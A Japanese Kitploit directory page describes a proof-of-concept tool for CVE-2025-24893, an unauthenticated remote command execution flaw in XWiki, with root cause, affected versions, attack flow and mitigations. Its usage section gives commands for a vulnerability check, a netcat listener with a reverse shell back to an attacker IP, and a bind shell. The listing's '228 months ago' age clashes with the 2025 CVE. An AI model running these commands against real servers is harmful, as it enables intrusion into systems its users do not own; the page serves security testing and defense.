Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24893-PoC — CVE-2025-24893の概念実証 – XWikiにおける安全でないサーバーサイドテンプレート評価による認証不要のリモートコマンド実行を示す。 | Kitploit
ツール/GitHubGitHub/breakingrohit/cve-2025-24893-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ペイロード開発
GitHubbreakingrohit/cve-2025-24893-poc

CVE-2025-24893-PoC

CVE-2025-24893の概念実証 – XWikiにおける安全でないサーバーサイドテンプレート評価による認証不要のリモートコマンド実行を示す。

リポジトリを見る
228ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893 – XWiki リモートコマンド実行 (概念実証)

概要

このリポジトリには、XWiki に影響を与える 認証不要のリモートコマンド実行 (RCE) 脆弱性 CVE-2025-24893 の 管理された概念実証 (PoC) が含まれています。

この脆弱性により、安全でないサーバーサイドのテンプレートおよびスクリプト評価により、攻撃者がサーバー上で任意のオペレーティングシステムコマンドを実行できるようになります。


XWikiについて

XWikiは、一般的に以下の用途で使用されるオープンソースのエンタープライズウィキプラットフォームです:

  • 内部ドキュメント
  • ナレッジベース
  • チームコラボレーションポータル

XWikiはインターネットに公開されたサーバーに頻繁にデプロイされるため、そのリクエスト処理とスクリプトロジックのセキュリティ脆弱性は実際の影響が大きくなる可能性があります。


脆弱性の概要

  • CVE ID: CVE-2025-24893
  • カテゴリ: リモートコマンド実行につながるサーバーサイドテンプレートインジェクション
  • 攻撃ベクトル: HTTP GETリクエスト
  • 認証要件: なし
  • 影響: サーバープリビレッジによる任意のコマンド実行

根本原因

SolrSearchエンドポイントに渡されたユーザー制御の入力が、Groovyスクリプトエンジンによって不適切に検証・評価されました。これにより、攻撃者が提供した入力が実行可能なサーバーサイドコードとして解釈され、ホストシステム上でのコマンド実行が可能となりました。


影響を受けるバージョン

  • 15.10.10までを含む XWikiバージョン
  • その後のリリースで修正済み

概念実証の機能

このPoCは以下を実証します:

  • 脆弱性検出モード 良性のサーバーサイド式を実行することで、対象インスタンスが脆弱かどうかを安全に確認します。
  • リモートコマンド実行 対象システム上での任意のコマンド実行を実証します。
  • リバースシェル実行 対象からテスターへのアウトバウンドシェル接続を確立します。
  • バインドシェル(オプション) 対象ホスト上でリスニングシェルを開きます(リバースシェルより信頼性が低い)。

使用方法

脆弱性チェック

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

リバースシェル(推奨)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

バインドシェル

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

攻撃の大まかな流れ

  1. 細工されたリクエストが脆弱なSolrSearchエンドポイントに送信される
  2. ユーザー制御の入力を介して悪意のあるテンプレート命令が注入される
  3. 入力がGroovyエンジンにより信頼されたコードとして評価される
  4. サーバー上で任意のオペレーティングシステムコマンドが実行される

緩和策ガイダンス

  • 直ちにXWikiを修正済みバージョンにアップグレードする
  • 可能な限り内部エンドポイントへのアクセスを制限する
  • サーバーサイドスクリプト機能を制限またはサンドボックス化する
  • アプリケーションログで異常なテンプレート実行動作を監視する

免責事項

このプロジェクトは教育目的および許可されたセキュリティテストのためのみ提供されています。

明示的な許可なくシステムに対してこのコードを不正に使用することは禁止されています。


クレジット

  • 元の脆弱性研究およびPoCの着想: Al Baradi Joy
  • 教育および防御的なセキュリティ研究のためにリファクタリングおよび拡張

このリポジトリの目的

このリポジトリは以下を示すために作成されました:

  • 実際の脆弱性の分析
  • 安全で責任ある概念実証の開発
  • サーバーサイドテンプレートインジェクションとRCEリスクの理解
  • 防御意識と緩和策の考慮事項

ツールをダウンロード